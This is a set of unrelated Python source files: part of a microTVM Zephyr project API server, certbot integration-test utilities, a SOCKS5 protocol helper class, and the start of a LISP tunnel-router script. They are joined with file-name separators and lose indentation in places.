def generate_project(self, model_library_format_path, standalone_crt_dir, project_dir, options):
project_dir = pathlib.Path(project_dir)
# Make project directory.
project_dir.mkdir()
# Copy ourselves to the generated project. TVM may perform further build steps on the generated project
# by launching the copy.
shutil.copy2(__file__, project_dir / os.path.basename(__file__))
# Place Model Library Format tarball in the special location, which this script uses to decide
# whether it's being invoked in a template or generated project.
project_model_library_format_tar_path = project_dir / MODEL_LIBRARY_FORMAT_RELPATH
shutil.copy2(model_library_format_path, project_model_library_format_tar_path)
        # Extract Model Library Format tarball into <project_dir>/model.
extract_path = os.path.splitext(project_model_library_format_tar_path)[0]
with tarfile.TarFile(project_model_library_format_tar_path) as tf:
os.makedirs(extract_path)
tf.extractall(path=extract_path)
if self._is_qemu(options):
shutil.copytree(API_SERVER_DIR / "qemu-hack", project_dir / "qemu-hack")
# Populate CRT.
crt_path = project_dir / "crt"
crt_path.mkdir()
for item in self.CRT_COPY_ITEMS:
src_path = os.path.join(standalone_crt_dir, item)
dst_path = crt_path / item
if os.path.isdir(src_path):
shutil.copytree(src_path, dst_path)
else:
shutil.copy2(src_path, dst_path)
# Populate Makefile.
with open(API_SERVER_DIR / "CMakeLists.txt.template", "r") as cmake_template_f:
with open(project_dir / "CMakeLists.txt", "w") as cmake_f:
for line in cmake_template_f:
if self.API_SERVER_CRT_LIBS_TOKEN in line:
crt_libs = self.CRT_LIBS_BY_PROJECT_TYPE[options["project_type"]]
line = line.replace("<API_SERVER_CRT_LIBS>", crt_libs)
cmake_f.write(line)
self._create_prj_conf(project_dir, options)
# Populate crt-config.h
crt_config_dir = project_dir / "crt_config"
crt_config_dir.mkdir()
shutil.copy2(
API_SERVER_DIR / "crt_config" / "crt_config.h", crt_config_dir / "crt_config.h"
)
# Populate src/
src_dir = project_dir / "src"
shutil.copytree(API_SERVER_DIR / "src" / options["project_type"], src_dir)
# Populate extra_files
if options.get("extra_files_tar"):
with tarfile.open(options["extra_files_tar"], mode="r:*") as tf:
tf.extractall(project_dir)
def build(self, options):
BUILD_DIR.mkdir()
cmake_args = ["cmake", ".."]
if options.get("verbose"):
cmake_args.append("-DCMAKE_VERBOSE_MAKEFILE:BOOL=TRUE")
if options.get("zephyr_base"):
cmake_args.append(f"-DZEPHYR_BASE:STRING={options['zephyr_base']}")
cmake_args.append(f"-DBOARD:STRING={options['zephyr_board']}")
check_call(cmake_args, cwd=BUILD_DIR)
args = ["make", "-j2"]
if options.get("verbose"):
args.append("VERBOSE=1")
check_call(args, cwd=BUILD_DIR)
# A list of all zephyr_board values which are known to launch using QEMU. Many platforms which
# launch through QEMU by default include "qemu" in their name. However, not all do. This list
# includes those tested platforms which do not include qemu.
_KNOWN_QEMU_ZEPHYR_BOARDS = ("mps2_an521",)
@classmethod
def _is_qemu(cls, options):
return (
"qemu" in options["zephyr_board"]
or options["zephyr_board"] in cls._KNOWN_QEMU_ZEPHYR_BOARDS
)
_KNOWN_FPU_ZEPHYR_BOARDS = (
"nucleo_f746zg",
"nucleo_l4r5zi",
"nrf5340dk_nrf5340_cpuapp",
"qemu_cortex_r5",
"qemu_riscv32",
"qemu_riscv64",
"qemu_x86",
"stm32f746g_disco",
)
@classmethod
def _has_fpu(cls, zephyr_board):
return zephyr_board in cls._KNOWN_FPU_ZEPHYR_BOARDS
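    # Illustrative sketch (comments only, not executed): how a few boards are
    # classified by the two helpers above.
    #
    #   Handler._is_qemu({"zephyr_board": "qemu_x86"})       # True, "qemu" in the name
    #   Handler._is_qemu({"zephyr_board": "mps2_an521"})     # True, listed in _KNOWN_QEMU_ZEPHYR_BOARDS
    #   Handler._is_qemu({"zephyr_board": "nucleo_f746zg"})  # False
    #   Handler._has_fpu("nucleo_f746zg")                    # True, listed in _KNOWN_FPU_ZEPHYR_BOARDS
    #   Handler._has_fpu("mps2_an521")                       # False, not in the known-FPU list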
def flash(self, options):
if self._is_qemu(options):
return # NOTE: qemu requires no flash step--it is launched from open_transport.
zephyr_board = options["zephyr_board"]
# The nRF5340DK requires an additional `nrfjprog --recover` before each flash cycle.
# This is because readback protection is enabled by default when this device is flashed.
# Otherwise, flashing may fail with an error such as the following:
# ERROR: The operation attempted is unavailable due to readback protection in
# ERROR: your device. Please use --recover to unlock the device.
if zephyr_board.startswith("nrf5340dk") and _get_flash_runner() == "nrfjprog":
recover_args = ["nrfjprog", "--recover"]
recover_args.extend(_get_nrf_device_args(options))
check_call(recover_args, cwd=API_SERVER_DIR / "build")
check_call(["make", "flash"], cwd=API_SERVER_DIR / "build")
def open_transport(self, options):
if self._is_qemu(options):
transport = ZephyrQemuTransport(options)
else:
transport = ZephyrSerialTransport(options)
to_return = transport.open()
self._transport = transport
atexit.register(lambda: self.close_transport())
return to_return
def close_transport(self):
if self._transport is not None:
self._transport.close()
self._transport = None
def read_transport(self, n, timeout_sec):
if self._transport is None:
raise server.TransportClosedError()
return self._transport.read(n, timeout_sec)
def write_transport(self, data, timeout_sec):
if self._transport is None:
raise server.TransportClosedError()
return self._transport.write(data, timeout_sec)
def _set_nonblock(fd):
flag = fcntl.fcntl(fd, fcntl.F_GETFL)
fcntl.fcntl(fd, fcntl.F_SETFL, flag | os.O_NONBLOCK)
new_flag = fcntl.fcntl(fd, fcntl.F_GETFL)
    assert (new_flag & os.O_NONBLOCK) != 0, f"Cannot set file descriptor {fd} to non-blocking"
class ZephyrSerialTransport:
@classmethod
def _lookup_baud_rate(cls, options):
zephyr_base = options.get("zephyr_base", os.environ["ZEPHYR_BASE"])
sys.path.insert(0, os.path.join(zephyr_base, "scripts", "dts"))
try:
import dtlib # pylint: disable=import-outside-toplevel
finally:
sys.path.pop(0)
dt_inst = dtlib.DT(BUILD_DIR / "zephyr" / "zephyr.dts")
uart_baud = (
dt_inst.get_node("/chosen")
.props["zephyr,console"]
.to_path()
.props["current-speed"]
.to_num()
)
_LOG.debug("zephyr transport: found UART baudrate from devicetree: %d", uart_baud)
return uart_baud
@classmethod
def _find_nrf_serial_port(cls, options):
com_ports = subprocess.check_output(
["nrfjprog", "--com"] + _get_device_args(options), encoding="utf-8"
)
ports_by_vcom = {}
for line in com_ports.split("\n")[:-1]:
parts = line.split()
ports_by_vcom[parts[2]] = parts[1]
return ports_by_vcom["VCOM2"]
@classmethod
def _find_openocd_serial_port(cls, options):
serial_number = openocd_serial(options)
ports = [p for p in serial.tools.list_ports.grep(serial_number)]
if len(ports) != 1:
raise Exception(
f"_find_openocd_serial_port: expected 1 port to match {serial_number}, "
f"found: {ports!r}"
)
return ports[0].device
@classmethod
def _find_serial_port(cls, options):
flash_runner = _get_flash_runner()
if flash_runner == "nrfjprog":
return cls._find_nrf_serial_port(options)
if flash_runner == "openocd":
return cls._find_openocd_serial_port(options)
raise FlashRunnerNotSupported(
f"Don't know how to deduce serial port for flash runner {flash_runner}"
)
def __init__(self, options):
self._options = options
self._port = None
def open(self):
port_path = self._find_serial_port(self._options)
self._port = serial.Serial(port_path, baudrate=self._lookup_baud_rate(self._options))
return server.TransportTimeouts(
session_start_retry_timeout_sec=2.0,
session_start_timeout_sec=5.0,
session_established_timeout_sec=5.0,
)
def close(self):
self._port.close()
self._port = None
def read(self, n, timeout_sec):
self._port.timeout = timeout_sec
to_return = self._port.read(n)
if not to_return:
raise server.IoTimeoutError()
return to_return
def write(self, data, timeout_sec):
self._port.write_timeout = timeout_sec
bytes_written = 0
while bytes_written < len(data):
n = self._port.write(data)
data = data[n:]
bytes_written += n
class ZephyrQemuMakeResult(enum.Enum):
QEMU_STARTED = "qemu_started"
MAKE_FAILED = "make_failed"
EOF = "eof"
class ZephyrQemuTransport:
"""The user-facing Zephyr QEMU transport class."""
    def __init__(self, options):
        self.options = options
        self.proc = None
        self.pipe_dir = None
        self.read_fd = None
        self.write_fd = None
        self.kwargs = {}
        self._queue = queue.Queue()
def open(self):
self.pipe_dir = pathlib.Path(tempfile.mkdtemp())
self.pipe = self.pipe_dir / "fifo"
self.write_pipe = self.pipe_dir / "fifo.in"
self.read_pipe = self.pipe_dir / "fifo.out"
os.mkfifo(self.write_pipe)
os.mkfifo(self.read_pipe)
if "gdbserver_port" in self.options:
if "env" in self.kwargs:
self.kwargs["env"] = copy.copy(self.kwargs["env"])
else:
self.kwargs["env"] = os.environ.copy()
self.kwargs["env"]["TVM_QEMU_GDBSERVER_PORT"] = str(self.options["gdbserver_port"])
        self.proc = subprocess.Popen(
            ["make", "run", f"QEMU_PIPE={self.pipe}"],
            cwd=BUILD_DIR,
            stdout=subprocess.PIPE,
            **self.kwargs,
        )
self._wait_for_qemu()
        # NOTE: although each pipe is unidirectional, open both as RDWR to work around a select
        # limitation on Linux. Without this, non-blocking I/O can't use timeouts, because named
        # FIFOs are always considered ready to read when no one has opened them for writing.
self.read_fd = os.open(self.read_pipe, os.O_RDWR | os.O_NONBLOCK)
self.write_fd = os.open(self.write_pipe, os.O_RDWR | os.O_NONBLOCK)
_set_nonblock(self.read_fd)
_set_nonblock(self.write_fd)
return server.TransportTimeouts(
session_start_retry_timeout_sec=2.0,
session_start_timeout_sec=5.0,
session_established_timeout_sec=5.0,
)
def close(self):
did_write = False
if self.write_fd is not None:
try:
server.write_with_timeout(
self.write_fd, b"\x01x", 1.0
) # Use a short timeout since we will kill the process
did_write = True
except server.IoTimeoutError:
pass
os.close(self.write_fd)
self.write_fd = None
if self.proc:
if not did_write:
self.proc.terminate()
try:
self.proc.wait(5.0)
except subprocess.TimeoutExpired:
self.proc.kill()
if self.read_fd:
os.close(self.read_fd)
self.read_fd = None
if self.pipe_dir is not None:
shutil.rmtree(self.pipe_dir)
self.pipe_dir = None
def read(self, n, timeout_sec):
return server.read_with_timeout(self.read_fd, n, timeout_sec)
def write(self, data, timeout_sec):
to_write = bytearray()
escape_pos = []
for i, b in enumerate(data):
if b == 0x01:
to_write.append(b)
escape_pos.append(i)
to_write.append(b)
num_written = server.write_with_timeout(self.write_fd, to_write, timeout_sec)
num_written -= sum(1 if x < num_written else 0 for x in escape_pos)
return num_written
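    # Illustrative sketch (comments only): write() doubles every 0x01 byte before
    # handing the buffer to the FIFO, then reports progress in terms of the
    # caller's original (unescaped) data.
    #
    #   data     = b"\x02\x01\x03"      # one byte needs escaping
    #   to_write = b"\x02\x01\x01\x03"  # the 0x01 is sent twice
    #   # if the OS accepts all 4 escaped bytes, num_written is reported as 3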
def _qemu_check_stdout(self):
for line in self.proc.stdout:
line = str(line)
_LOG.info("%s", line)
if "[QEMU] CPU" in line:
self._queue.put(ZephyrQemuMakeResult.QEMU_STARTED)
else:
line = re.sub("[^a-zA-Z0-9 \n]", "", line)
pattern = r"recipe for target (\w*) failed"
if re.search(pattern, line, re.IGNORECASE):
self._queue.put(ZephyrQemuMakeResult.MAKE_FAILED)
self._queue.put(ZephyrQemuMakeResult.EOF)
def _wait_for_qemu(self):
threading.Thread(target=self._qemu_check_stdout, daemon=True).start()
while True:
try:
item = self._queue.get(timeout=120)
except Exception:
raise TimeoutError("QEMU setup timeout.")
if item == ZephyrQemuMakeResult.QEMU_STARTED:
break
if item in [ZephyrQemuMakeResult.MAKE_FAILED, ZephyrQemuMakeResult.EOF]:
raise RuntimeError("QEMU setup failed.")
raise ValueError(f"{item} not expected.")
if __name__ == "__main__":
server.main(Handler())
|
misc.py
|
"""
Misc module contains stateless functions that could be used during pytest execution,
or outside during setup/teardown of the integration tests environment.
"""
import contextlib
import errno
import multiprocessing
import os
import re
import shutil
import stat
import sys
import tempfile
import time
import warnings
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives.asymmetric import ec
from cryptography.hazmat.primitives.serialization import Encoding
from cryptography.hazmat.primitives.serialization import NoEncryption
from cryptography.hazmat.primitives.serialization import PrivateFormat
from OpenSSL import crypto
import pkg_resources
import requests
from six.moves import SimpleHTTPServer
from six.moves import socketserver
RSA_KEY_TYPE = 'rsa'
ECDSA_KEY_TYPE = 'ecdsa'
def check_until_timeout(url, attempts=30):
"""
Wait and block until given url responds with status 200, or raise an exception
after the specified number of attempts.
:param str url: the URL to test
:param int attempts: the number of times to try to connect to the URL
:raise ValueError: exception raised if unable to reach the URL
"""
try:
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
except ImportError:
# Handle old versions of request with vendorized urllib3
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
for _ in range(attempts):
time.sleep(1)
try:
if requests.get(url, verify=False).status_code == 200:
return
except requests.exceptions.ConnectionError:
pass
raise ValueError('Error, url did not respond after {0} attempts: {1}'.format(attempts, url))
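# Minimal usage sketch (the port and path below are illustrative only):
#
#   check_until_timeout('http://localhost:5002/healthz', attempts=10)
#   # returns silently once the endpoint answers 200, raises ValueError otherwise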
class GracefulTCPServer(socketserver.TCPServer):
"""
This subclass of TCPServer allows graceful reuse of an address that has
just been released by another instance of TCPServer.
"""
allow_reuse_address = True
def _run_server(port):
GracefulTCPServer(('', port), SimpleHTTPServer.SimpleHTTPRequestHandler).serve_forever()
@contextlib.contextmanager
def create_http_server(port):
"""
Setup and start an HTTP server for the given TCP port.
This server stays active for the lifetime of the context, and is automatically
stopped with context exit, while its temporary webroot is deleted.
:param int port: the TCP port to use
:return str: the temporary webroot attached to this server
"""
current_cwd = os.getcwd()
webroot = tempfile.mkdtemp()
process = multiprocessing.Process(target=_run_server, args=(port,))
try:
# SimpleHTTPServer is designed to serve files from the current working directory at the
# time it starts. So we temporarily change the cwd to our crafted webroot before launch.
try:
os.chdir(webroot)
process.start()
finally:
os.chdir(current_cwd)
check_until_timeout('http://localhost:{0}/'.format(port))
yield webroot
finally:
try:
if process.is_alive():
process.terminate()
process.join() # Block until process is effectively terminated
finally:
shutil.rmtree(webroot)
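# Minimal usage sketch (the port is illustrative only): the context manager yields
# the webroot, so a file dropped there is immediately served over HTTP.
#
#   with create_http_server(5002) as webroot:
#       with open(os.path.join(webroot, 'hello.txt'), 'w') as file_h:
#           file_h.write('hi')
#       assert requests.get('http://localhost:5002/hello.txt').text == 'hi'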
def list_renewal_hooks_dirs(config_dir):
"""
Find and return paths of all hook directories for the given certbot config directory
:param str config_dir: path to the certbot config directory
:return str[]: list of path to the standard hooks directory for this certbot instance
"""
renewal_hooks_root = os.path.join(config_dir, 'renewal-hooks')
return [os.path.join(renewal_hooks_root, item) for item in ['pre', 'deploy', 'post']]
def generate_test_file_hooks(config_dir, hook_probe):
"""
Create a suite of certbot hook scripts and put them in the relevant hook directory
for the given certbot configuration directory. These scripts, when executed, will write
specific verbs in the given hook_probe file to allow asserting they have effectively
been executed. The deploy hook also checks that the renewal environment variables are set.
:param str config_dir: current certbot config directory
:param hook_probe: path to the hook probe to test hook scripts execution
"""
hook_path = pkg_resources.resource_filename('certbot_integration_tests', 'assets/hook.py')
for hook_dir in list_renewal_hooks_dirs(config_dir):
        # We want an equivalent of bash `mkdir -p $HOOK_DIR` that does not fail if any folder in
        # the hierarchy already exists, which is not the case for os.makedirs. Python 3 has an
        # optional parameter `exist_ok` to not fail on an existing dir, but Python 2.7 does not.
        # So we wrap it in a try/except. To be removed when support for py27 is dropped.
try:
os.makedirs(hook_dir)
except OSError as error:
if error.errno != errno.EEXIST:
raise
if os.name != 'nt':
entrypoint_script_path = os.path.join(hook_dir, 'entrypoint.sh')
entrypoint_script = '''\
#!/usr/bin/env bash
set -e
"{0}" "{1}" "{2}" "{3}"
'''.format(sys.executable, hook_path, entrypoint_script_path, hook_probe)
else:
entrypoint_script_path = os.path.join(hook_dir, 'entrypoint.bat')
entrypoint_script = '''\
@echo off
"{0}" "{1}" "{2}" "{3}"
'''.format(sys.executable, hook_path, entrypoint_script_path, hook_probe)
with open(entrypoint_script_path, 'w') as file_h:
file_h.write(entrypoint_script)
os.chmod(entrypoint_script_path, os.stat(entrypoint_script_path).st_mode | stat.S_IEXEC)
@contextlib.contextmanager
def manual_http_hooks(http_server_root, http_port):
"""
Generate suitable http-01 hooks command for test purpose in the given HTTP
server webroot directory. These hooks command use temporary python scripts
that are deleted upon context exit.
:param str http_server_root: path to the HTTP server configured to serve http-01 challenges
:param int http_port: HTTP port that the HTTP server listen on
:return (str, str): a tuple containing the authentication hook and cleanup hook commands
"""
tempdir = tempfile.mkdtemp()
try:
auth_script_path = os.path.join(tempdir, 'auth.py')
with open(auth_script_path, 'w') as file_h:
file_h.write('''\
#!/usr/bin/env python
import os
import requests
import time
import sys
challenge_dir = os.path.join('{0}', '.well-known', 'acme-challenge')
os.makedirs(challenge_dir)
challenge_file = os.path.join(challenge_dir, os.environ.get('CERTBOT_TOKEN'))
with open(challenge_file, 'w') as file_h:
file_h.write(os.environ.get('CERTBOT_VALIDATION'))
url = 'http://localhost:{1}/.well-known/acme-challenge/' + os.environ.get('CERTBOT_TOKEN')
for _ in range(0, 10):
time.sleep(1)
try:
        if requests.get(url).status_code == 200:
sys.exit(0)
except requests.exceptions.ConnectionError:
pass
raise ValueError('Error, url did not respond after 10 attempts: {{0}}'.format(url))
'''.format(http_server_root.replace('\\', '\\\\'), http_port))
os.chmod(auth_script_path, 0o755)
cleanup_script_path = os.path.join(tempdir, 'cleanup.py')
with open(cleanup_script_path, 'w') as file_h:
file_h.write('''\
#!/usr/bin/env python
import os
import shutil
well_known = os.path.join('{0}', '.well-known')
shutil.rmtree(well_known)
'''.format(http_server_root.replace('\\', '\\\\')))
os.chmod(cleanup_script_path, 0o755)
yield ('{0} {1}'.format(sys.executable, auth_script_path),
'{0} {1}'.format(sys.executable, cleanup_script_path))
finally:
shutil.rmtree(tempdir)
def generate_csr(domains, key_path, csr_path, key_type=RSA_KEY_TYPE):
"""
Generate a private key, and a CSR for the given domains using this key.
:param domains: the domain names to include in the CSR
:type domains: `list` of `str`
:param str key_path: path to the private key that will be generated
:param str csr_path: path to the CSR that will be generated
:param str key_type: type of the key (misc.RSA_KEY_TYPE or misc.ECDSA_KEY_TYPE)
"""
if key_type == RSA_KEY_TYPE:
key = crypto.PKey()
key.generate_key(crypto.TYPE_RSA, 2048)
elif key_type == ECDSA_KEY_TYPE:
with warnings.catch_warnings():
# Ignore a warning on some old versions of cryptography
warnings.simplefilter('ignore', category=PendingDeprecationWarning)
key = ec.generate_private_key(ec.SECP384R1(), default_backend())
key = key.private_bytes(encoding=Encoding.PEM, format=PrivateFormat.TraditionalOpenSSL,
encryption_algorithm=NoEncryption())
key = crypto.load_privatekey(crypto.FILETYPE_PEM, key)
else:
raise ValueError('Invalid key type: {0}'.format(key_type))
with open(key_path, 'wb') as file_h:
file_h.write(crypto.dump_privatekey(crypto.FILETYPE_PEM, key))
req = crypto.X509Req()
san = ', '.join(['DNS:{0}'.format(item) for item in domains])
san_constraint = crypto.X509Extension(b'subjectAltName', False, san.encode('utf-8'))
req.add_extensions([san_constraint])
req.set_pubkey(key)
req.set_version(2)
req.sign(key, 'sha256')
with open(csr_path, 'wb') as file_h:
file_h.write(crypto.dump_certificate_request(crypto.FILETYPE_ASN1, req))
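# Minimal usage sketch (paths and domains are illustrative only):
#
#   generate_csr(['example.com', 'www.example.com'],
#                '/tmp/key.pem', '/tmp/csr.der', key_type=ECDSA_KEY_TYPE)
#
# This writes a PEM private key to key.pem and a DER-encoded CSR (FILETYPE_ASN1)
# carrying both names as subjectAltName entries to csr.der.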
def read_certificate(cert_path):
"""
Load the certificate from the provided path, and return a human readable version of it (TEXT mode).
:param str cert_path: the path to the certificate
:returns: the TEXT version of the certificate, as it would be displayed by openssl binary
"""
with open(cert_path, 'rb') as file:
data = file.read()
cert = crypto.load_certificate(crypto.FILETYPE_PEM, data)
return crypto.dump_certificate(crypto.FILETYPE_TEXT, cert).decode('utf-8')
def load_sample_data_path(workspace):
"""
Load the certbot configuration example designed to make OCSP tests, and return its path
:param str workspace: current test workspace directory path
:returns: the path to the loaded sample data directory
:rtype: str
"""
original = pkg_resources.resource_filename('certbot_integration_tests', 'assets/sample-config')
copied = os.path.join(workspace, 'sample-config')
shutil.copytree(original, copied, symlinks=True)
if os.name == 'nt':
# Fix the symlinks on Windows since GIT is not creating them upon checkout
for lineage in ['a.encryption-example.com', 'b.encryption-example.com']:
current_live = os.path.join(copied, 'live', lineage)
for name in os.listdir(current_live):
if name != 'README':
current_file = os.path.join(current_live, name)
with open(current_file) as file_h:
src = file_h.read()
os.unlink(current_file)
os.symlink(os.path.join(current_live, src), current_file)
return copied
def echo(keyword, path=None):
"""
Generate a platform independent executable command
that echoes the given keyword into the given file.
:param keyword: the keyword to echo (must be a single keyword)
    :param path: path to the file where the keyword is echoed
:return: the executable command
"""
if not re.match(r'^\w+$', keyword):
raise ValueError('Error, keyword `{0}` is not a single keyword.'
.format(keyword))
return '{0} -c "from __future__ import print_function; print(\'{1}\')"{2}'.format(
os.path.basename(sys.executable), keyword, ' >> "{0}"'.format(path) if path else '')
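# Minimal usage sketch: echo('deploy', path='/tmp/probe') returns a command along
# the lines of
#
#   python -c "from __future__ import print_function; print('deploy')" >> "/tmp/probe"
#
# where the interpreter name comes from sys.executable (so it may be python3, etc.)
# and the path shown here is illustrative only.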
|
tools.py
|
from .exceptions import UnexpectedValue
from .constants import *
import socket, struct, threading, time
class Tools:
atype2AF = {
ATYP_IPV4:socket.AF_INET,
ATYP_IPV6:socket.AF_INET6,
ATYP_DOMAINNAME:socket.AF_INET
}
def recv2(conn:socket.socket, *args):
"""
        A thin wrapper around recv() to catch empty returns (closed socket)
"""
try:
data = conn.recv(*args)
if not data:
raise ConnectionResetError("Cannot receive data, socket seems closed")
except Exception as e:
raise ConnectionResetError(str(e))
return data
def serverReadCmd(conn:socket.socket) -> tuple:
"""
Read and parse cmd message from client
return (version:int, cmd:int, atype:int, address:str, port:int)
"""
ver, cmd, _, atype = __class__.recv2(conn, 4, socket.MSG_WAITALL)
if atype == ATYP_DOMAINNAME:
length_name, = __class__.recv2(conn, 1, socket.MSG_WAITALL)
name = __class__.recv2(conn, length_name).decode("utf-8")
elif atype == ATYP_IPV4:
name = socket.inet_ntop(socket.AF_INET, __class__.recv2(conn, 4, socket.MSG_WAITALL))
elif atype == ATYP_IPV6:
name = socket.inet_ntop(socket.AF_INET6, __class__.recv2(conn, 16, socket.MSG_WAITALL))
else:
            raise UnexpectedValue(f"Client sent unknown address type {atype}")
port = int.from_bytes(__class__.recv2(conn, 2, socket.MSG_WAITALL), byteorder='big')
return (ver, cmd, atype, name, port)
def serverSendCmdResp(conn:socket.socket, version:int, rep:int, atype:int, bnd_addr:str, bnd_port:int):
"""Send server response to cmd message"""
if atype == ATYP_DOMAINNAME:
bnd_addr = bnd_addr.encode("utf-8")
data = struct.pack(f"!BBxBB{len(bnd_addr)}sH", version, rep, atype, len(bnd_addr), bnd_addr, bnd_port)
elif atype == ATYP_IPV4:
data = struct.pack("!BBxB4sH", version, rep, atype, socket.inet_pton(socket.AF_INET, bnd_addr), bnd_port)
        elif atype == ATYP_IPV6:
            data = struct.pack("!BBxB16sH", version, rep, atype, socket.inet_pton(socket.AF_INET6, bnd_addr), bnd_port)
        else:
            raise UnexpectedValue(f"Unknown address type {atype} for command response")
        conn.send(data)
def serverReadHello(conn:socket.socket) -> tuple:
"""Read and parse "greetings" message from client
return (version:int, methods:list[int])"""
b = __class__.recv2(conn, 2, socket.MSG_WAITALL)
ver = b[0]
nm = b[1]
b = __class__.recv2(conn, nm, socket.MSG_WAITALL)
methods = []
for mtd in b:
methods.append(mtd)
return (ver, methods)
    def serverSendHelloResp(conn:socket.socket, version:int, authtype:int):
        """Send server response to greetings message"""
conn.send(struct.pack("BB", version, authtype))
def serverReadAuthCreds(conn:socket.socket) ->tuple:
"""
Get client creds by rfc1929 (socks username/password auth)
return (version:int, username:str, password:str)
"""
version, ulen = struct.unpack("BB", __class__.recv2(conn, 2, socket.MSG_WAITALL))
username = __class__.recv2(conn, ulen, socket.MSG_WAITALL)
plen = ord(__class__.recv2(conn, 1))
password = __class__.recv2(conn, plen, socket.MSG_WAITALL)
return (version, username.decode("utf-8"), password.decode("utf-8"))
def serverSendAuthResp(conn:socket.socket, version:int, status:int):
"""
        Send auth response \n
        status greater than 0 indicates auth failure
"""
conn.send(struct.pack('BB', version, status))
#-------------------------------------------------------------------------------
def clientSendHello(conn:socket.socket, version:int, authtypes:list[int]):
"""
Sends a client Greetings message to server (version, authtypes)
"""
conn.send(struct.pack(f"BB{'B'*len(authtypes)}", version, len(authtypes), *authtypes))
def clientReadHelloResp(conn:socket.socket):
"""
Reads server Greetings message (version, selected auth type)
returns (version:int, selectedauth:int)
"""
version, selected_auth = __class__.recv2(conn, 2)
return (version, selected_auth)
    def clientSendCmd(conn:socket.socket, version:int, cmd:int, atype:int, address:str, port:int):
        """
        Sends a command request to the server
        """
        if atype == ATYP_DOMAINNAME:
            conn.send(struct.pack(f"!BBxBB{len(address)}sH", version, cmd, atype, len(address), address.encode("utf-8"), port))
        elif atype == ATYP_IPV4:
            conn.send(struct.pack("!BBxB4sH", version, cmd, atype, socket.inet_pton(socket.AF_INET, address), port))
        elif atype == ATYP_IPV6:
            conn.send(struct.pack("!BBxB16sH", version, cmd, atype, socket.inet_pton(socket.AF_INET6, address), port))
        else:
            raise UnexpectedValue(f"Client requested unknown address type {atype}")
def clientReadCmdResp(conn:socket.socket):
"""
Reads server command response\n
returns (version:int, rep:int, atype:int, address:str, port:int)
"""
b = __class__.recv2(conn, 4)
version, rep, atype = struct.unpack("BBxB", b)
if atype == ATYP_DOMAINNAME:
adrsize = __class__.recv2(conn, 1)[0]
address, port = struct.unpack(f"!{adrsize}sH", __class__.recv2(conn, adrsize+2))
elif atype == ATYP_IPV4:
address, port = struct.unpack("!4sH", __class__.recv2(conn, 10))
address = socket.inet_ntop(socket.AF_INET, address)
elif atype == ATYP_IPV6:
address, port = struct.unpack("!16sH", __class__.recv2(conn, 18))
address = socket.inet_ntop(socket.AF_INET6, address)
else:
            raise UnexpectedValue(f"Server sent unknown address type {atype}")
return (version, rep, atype, address, port)
def clientSendAuth(conn:socket.socket, username:str, password:str):
"""
Sends username/pasword auth packet
"""
s = struct.pack(f"BB{len(username)}sB{len(password)}s", 1, len(username), username.encode("utf-8"), len(password), password.encode("utf-8"))
conn.send(s)
def clientReadAuthResp(conn:socket.socket):
"""
Reads server response on username/password auth
return (ver:int, status:int)
"""
ver, status = __class__.recv2(conn, 2)
return (ver, status)
def proxy(target1:socket.socket, target2:socket.socket):
"""
        Relays data from target1 to target2 and back\n
        Returns control when at least one socket is closed\n
        Sets a 5 second timeout on both sockets
"""
def resend(from_s:socket.socket, to_s:socket.socket):
try:
from_s.settimeout(5)
while True:
try:
b = from_s.recv(1024)
if len(b) == 0:
return
to_s.send(b)
except socket.timeout as e:
pass
except Exception as e:
# print(f"c > t {e}")
return
except:
pass
t1 = threading.Thread(target=resend, args=(target1, target2), name=f"{target1.getpeername()} client > I am > target {target2.getpeername()} ")
t2 = threading.Thread(target=resend, args=(target2, target1), name=f"{target1.getpeername()} client < I am < target {target2.getpeername()} ")
t1.start()
t2.start()
while t1.is_alive() and t2.is_alive():
time.sleep(5)
return
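    # Illustrative client-side handshake sketch (comments only, not executed). It
    # strings the client helpers above together for a CONNECT with no authentication.
    # The host/port values are placeholders, and SOCKS_VERSION5, AUTH_NONE and
    # CMD_CONNECT are assumed to be defined in .constants alongside the ATYP_* values.
    #
    #   s = socket.create_connection(("127.0.0.1", 1080))
    #   Tools.clientSendHello(s, SOCKS_VERSION5, [AUTH_NONE])
    #   ver, chosen_auth = Tools.clientReadHelloResp(s)
    #   Tools.clientSendCmd(s, SOCKS_VERSION5, CMD_CONNECT, ATYP_DOMAINNAME, "example.com", 80)
    #   ver, rep, atype, bnd_addr, bnd_port = Tools.clientReadCmdResp(s)
    #   # rep == 0 means the proxy established the connection; s now relays to example.com:80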
|
lisp-etr.py
|
#-----------------------------------------------------------------------------
#
# Copyright 2013-2019 lispers.net - Dino Farinacci <farinacci@gmail.com>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# -----------------------------------------------------------------------------
#
# lisp-etr.py
#
# This file performs LISP Egress Tunnel Router (ETR) functionality.
#
# -----------------------------------------------------------------------------
import lisp
import lispconfig
import socket
import select
import threading
import time
import pcappy
import struct
import commands
import os
try:
import pytun
except:
pytun = None
#endtry
#------------------------------------------------------------------------------
#
# Global data structures relative to the lisp-etr process.
#
lisp_register_timer = None
lisp_trigger_register_timer = None
lisp_etr_info_timer = None
lisp_ephem_socket = None
lisp_ephem_port = lisp.lisp_get_ephemeral_port()
lisp_ipc_listen_socket = None
lisp_send_sockets = [None, None, None]
lisp_raw_socket = None
lisp_l2_socket = None
lisp_mac_header = None
LISP_MAP_REGISTER_INTERVAL = 60 # In units of seconds
#------------------------------------------------------------------------------
#
# lisp_etr_database_mapping_command
#
# This function supports adding additional RLOCs to a database-mapping entry
# that already exists.
#
def lisp_etr_database_mapping_command(kv_pair):
global lisp_trigger_register_timer
global lisp_send_sockets
lispconfig.lisp_database_mapping_command(kv_pair, lisp_ephem_port)
#
    # Trigger Map-Register when all database-mappings are configured.
#
    # Do not trigger Map-Register if NAT-traversal is configured. We may not
    # have the global RLOC yet from Info-Replies. When the Info-Reply comes
    # in, we do trigger Map-Registers to all map-servers.
#
if (lisp.lisp_nat_traversal): return
if (lisp_trigger_register_timer != None and
lisp_trigger_register_timer.is_alive()): return
if (len(lisp.lisp_map_servers_list) > 0):
lisp_trigger_register_timer = threading.Timer(5,
lisp_process_register_timer, [lisp_send_sockets])
lisp_trigger_register_timer.start()
#endif
